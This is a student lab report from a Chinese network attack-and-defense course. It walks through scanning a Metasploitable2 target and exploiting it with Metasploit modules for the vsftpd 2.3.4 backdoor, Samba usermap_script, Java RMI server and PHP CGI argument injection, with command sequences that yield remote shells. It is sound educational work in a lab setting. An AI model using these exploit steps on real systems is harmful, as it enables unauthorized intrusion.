20222402 2024-2025-1 《网络与系统攻防技术》实验六实验报告
1.实验内容
1.1本周学习内容
常见的网络安全协议包括SSL/TLS等。
网络安全协议攻击手段
DNS欺骗攻击:攻击者冒充域名服务器,将查询的IP地址设为攻击者的IP地址,从而诱骗用户访问恶意网站或下载恶意软件。
ARP欺骗攻击:分为对路由器ARP表的欺骗和对内网PC的网关欺骗,通过截获网关数据或伪造网关来实施攻击。
1.2实验内容
(1)前期渗透
①主机发现(可用Aux中的arp_sweep,search一下就可以use)
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。
(2)Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
利用步骤:
在kali中执行msfconsole 启动metasploit
use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞
set RHOST XX.xx.xx.xx 设置要攻击的机器IP(靶机IP)
exploit/run 开始攻击
利用成功
执行uname –a、 pwd、 id等命令 验证
(3)SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
利用步骤:
use exploit/multi/samba/usermap_script 选择漏洞
set RHOST ip 设置要攻击的机器IP
exploit 开始攻击
利用成功 执行uname–a验证
(4)Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
操作步骤:
首先查看1099端口是否打开。
然后在MSF中:
use exploit/multi/misc/java_rmi_server
show options 查看配置参数
set RHOST (靶机IP)
exploit/run
sessions -i id
shell (进入meterpreter时,使用whoami验证下)
(5)PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
在kali中执行msfconsole,启动metasploit
msf > use exploit/multi/http/php_cgi_arg_injection 选择漏洞
set RHOST ip 设置要攻击的机器IP
exploit/run 开始攻击
2.实验过程
2.1前期渗透
2.1.1主机发现
攻击机:
靶机:
使用Aux中的arp_sweep扫描靶机:
扫描成功
2.1.2端口扫描
使用Aux中的portscan/tcp扫描靶机IP:
设置IP后开始扫描端口:
2.1.3扫描系统版本、漏洞
扫描系统版本:
扫描漏洞:
2.2Vsftpd源码包后门漏洞(21端口)
在kali中执行msfconsole 启动metasploit
use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞
set RHOST 192.168.52.149 设置要攻击的机器IP
exploit 开始攻击
2.3SambaMS-RPC Shell命令注入漏洞(端口139)
use exploit/multi/samba/usermap_script 选择漏洞
set RHOST ip 192.168.52.149 设置要攻击的机器IP
exploit 开始攻击
2.4Java RMI SERVER命令执行漏洞(1099端口)
首先查看1099端口是否打开
use exploit/multi/misc/java_rmi_server
show options 查看配置参数
set RHOST 192.168.52.149(靶机IP)
exploit/run
sessions -i id
shell
2.5PHP CGI参数执行注入漏洞(80端口)
use exploit/multi/http/php_cgi_arg_injection 选择漏洞
set RHOST ip 192.168.52.149 设置要攻击的机器IP
exploit/run 开始攻击
3.问题及解决方案
无
4.学习感悟、思考等
这次实验让我深刻理解了漏洞评估的重要性。通过Metasploitable2靶机,我学会了如何结合使用各种工具如Nmap、Open-Vas等进行漏洞扫描和分析。
在实验过程中,我体验到了不同漏洞利用模块的操作。例如,针对Samba服务的漏洞,我通过搜索并选择了合适的漏洞利用模块,并设置了攻击载荷和参数,最终获取了目标主机的Shell。这个过程让我对漏洞利用有了更深入的认识,并学会了如何根据目标系统的具体情况选择合适的Exploit和Payload。
最后,这次实验也让我意识到了自动化工具与手动方法的结合使用的重要性。虽然自动化工具如Open-Vas可以大大提高扫描效率,但其准确性有时需要手动方法进行验证。因此,在实际应用中,我们需要结合两者来确保扫描结果的准确性。
参考资料
- 无